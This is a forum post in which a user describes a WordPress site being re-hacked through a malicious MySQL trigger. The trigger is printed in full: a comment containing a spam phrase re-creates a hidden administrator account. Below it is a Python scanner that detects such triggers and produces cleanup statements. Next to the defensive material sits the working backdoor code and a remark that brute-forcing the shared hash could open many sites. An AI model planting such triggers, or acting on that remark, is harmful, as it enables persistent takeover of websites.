Re-Hacked via DB-Trigger
Hi there,
I just helped a friend with a hacked website. It was round 2, because we had removed the false admin account (wp-admin | [email protected] – seems to be a known hacker account) and deleted/repaired all hacked files.
When the account appeared again I looked deeper into everything. I found a trigger (name: after_insert_comment) in the database with the following code:
BEGIN
  IF NEW.comment_content LIKE '%are you struggling to get comments on your blog?%' THEN
    SET @lastInsertWpUsersId = (SELECT MAX(id) FROM database.wp_users);
    SET @nextWpUsersID = @lastInsertWpUsersId + 1;
    INSERT INTO database.wp_users (ID, user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_activation_key, user_status, display_name)
      VALUES (@nextWpUsersID, 'wpadmin', '$1$yUXpYwXN$JhwwoGJxViPhtGdNG5UZs0', 'wpadmin', '[email protected]', 'https://wordpress.com', '2014-06-08 00:00:00', '', '0', 'Kris');
    INSERT INTO database.wp_usermeta (umeta_id, user_id, meta_key, meta_value)
      VALUES (NULL, @nextWpUsersID, 'wp_capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}');
    INSERT INTO database.wp_usermeta (umeta_id, user_id, meta_key, meta_value)
      VALUES (NULL, @nextWpUsersID, 'wp_user_level', '10');
  END IF;
END
I found the same trigger in three databases in the same webspace and wonder on how many pages this trigger is waiting.
Is there any way that Wordfence could find DB triggers and show them in the scan?

PS: The pw hash was the same in all triggers, so bruteforcing it could be pretty interesting, since you could get access to a lot of sites (I changed it just a bit ;-))
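Since WordPress core creates no database triggers of its own, a scan can simply list every trigger in the database and rank the ones that write to the user tables. The script below is an added example for this thread, not code from the post or from the Wordfence plugin. It relies only on the standard information_schema.TRIGGERS view that MySQL and MariaDB expose; the regex heuristics, the severity labels and the two sample rows (one mimicking the posted trigger with a placeholder hash, one harmless audit trigger) are constructed for this example so that it runs offline.

```python
"""Rank MySQL/MariaDB triggers on a WordPress database by how suspicious they look."""
import re

# Query to run against the server (information_schema.TRIGGERS is a standard
# MySQL/MariaDB view). The schema filter and column list are this example's choice.
TRIGGER_QUERY = """
SELECT TRIGGER_SCHEMA, TRIGGER_NAME, DEFINER, EVENT_MANIPULATION,
       EVENT_OBJECT_TABLE, ACTION_TIMING, ACTION_STATEMENT
FROM information_schema.TRIGGERS
WHERE TRIGGER_SCHEMA NOT IN ('mysql', 'sys', 'information_schema', 'performance_schema')
ORDER BY TRIGGER_SCHEMA, TRIGGER_NAME
""".strip()

# Heuristics (assumed for this example): an INSERT into wp_users/wp_usermeta,
# references to role data, or a literal password hash inside the trigger body.
USER_TABLE_RE = re.compile(
    r"\binsert\s+into\s+`?(?:\w+`?\.`?)?(wp_users|wp_usermeta)\b", re.I)
ROLE_RE = re.compile(r"administrator|wp_capabilities|wp_user_level", re.I)
HASH_RE = re.compile(r"\$(?:1|P|2y|H)\$")  # md5-crypt, phpass, bcrypt prefixes


def assess_trigger(row):
    """Return (severity, reasons) for one information_schema.TRIGGERS row."""
    body = row["ACTION_STATEMENT"]
    reasons = []
    tables = sorted(set(USER_TABLE_RE.findall(body)))
    if tables:
        reasons.append("writes to " + ", ".join(tables))
    if ROLE_RE.search(body):
        reasons.append("references role/capability data")
    if HASH_RE.search(body):
        reasons.append("embeds a literal password hash")
    if row["EVENT_OBJECT_TABLE"].endswith("comments") and row["EVENT_MANIPULATION"] == "INSERT":
        reasons.append("fires on comment insert, which any visitor can cause")
    severity = "high" if tables or HASH_RE.search(body) else "review"
    return severity, reasons


def drop_statement(row):
    """Remediation statement for a trigger that should not exist."""
    return f"DROP TRIGGER IF EXISTS `{row['TRIGGER_SCHEMA']}`.`{row['TRIGGER_NAME']}`;"


def scan_triggers(rows):
    """Assess every row; WordPress core creates no triggers, so all are reported."""
    findings = []
    for row in rows:
        severity, reasons = assess_trigger(row)
        findings.append({
            "schema": row["TRIGGER_SCHEMA"],
            "name": row["TRIGGER_NAME"],
            "table": row["EVENT_OBJECT_TABLE"],
            "definer": row["DEFINER"],
            "severity": severity,
            "reasons": reasons,
            "remediation": drop_statement(row),
        })
    return findings


# Constructed sample rows standing in for a real query result. The first mimics
# the trigger from the post with a placeholder hash; the second is a harmless
# audit trigger an administrator might have added on purpose.
SAMPLE_ROWS = [
    {
        "TRIGGER_SCHEMA": "wp_site1", "TRIGGER_NAME": "after_insert_comment",
        "DEFINER": "wpuser@localhost", "EVENT_MANIPULATION": "INSERT",
        "EVENT_OBJECT_TABLE": "wp_comments", "ACTION_TIMING": "AFTER",
        "ACTION_STATEMENT": (
            "BEGIN IF NEW.comment_content LIKE '%are you struggling to get comments on your blog?%' "
            "THEN SET @n = (SELECT MAX(id) FROM wp_site1.wp_users) + 1; "
            "INSERT INTO wp_site1.wp_users (ID, user_login, user_pass) "
            "VALUES (@n, 'wpadmin', '$1$PLACEHOLDER$HASHVALUE'); "
            "INSERT INTO wp_site1.wp_usermeta (user_id, meta_key, meta_value) "
            "VALUES (@n, 'wp_capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}'); END IF; END"
        ),
    },
    {
        "TRIGGER_SCHEMA": "wp_site1", "TRIGGER_NAME": "audit_options_update",
        "DEFINER": "wpuser@localhost", "EVENT_MANIPULATION": "UPDATE",
        "EVENT_OBJECT_TABLE": "wp_options", "ACTION_TIMING": "AFTER",
        "ACTION_STATEMENT": "BEGIN INSERT INTO site_audit_log (changed_at, option_name) "
                            "VALUES (NOW(), NEW.option_name); END",
    },
]

if __name__ == "__main__":
    for f in scan_triggers(SAMPLE_ROWS):
        print(f"[{f['severity']}] {f['schema']}.{f['name']} on {f['table']} "
              f"(definer {f['definer']}): {'; '.join(f['reasons']) or 'no heuristic hit'}")
        print("   remediation:", f["remediation"])
```

To use it on a real server, run TRIGGER_QUERY through the mysql client or `wp db query` with a user that can read information_schema, and pass the rows (as dicts keyed by column name, e.g. from a DictCursor) to scan_triggers. Because the post found the same trigger in three databases of one webspace, the query deliberately does not filter on a single schema: every database the web account can see is checked in one pass, and the returned DROP statements are the cleanup step that file-level repair alone misses.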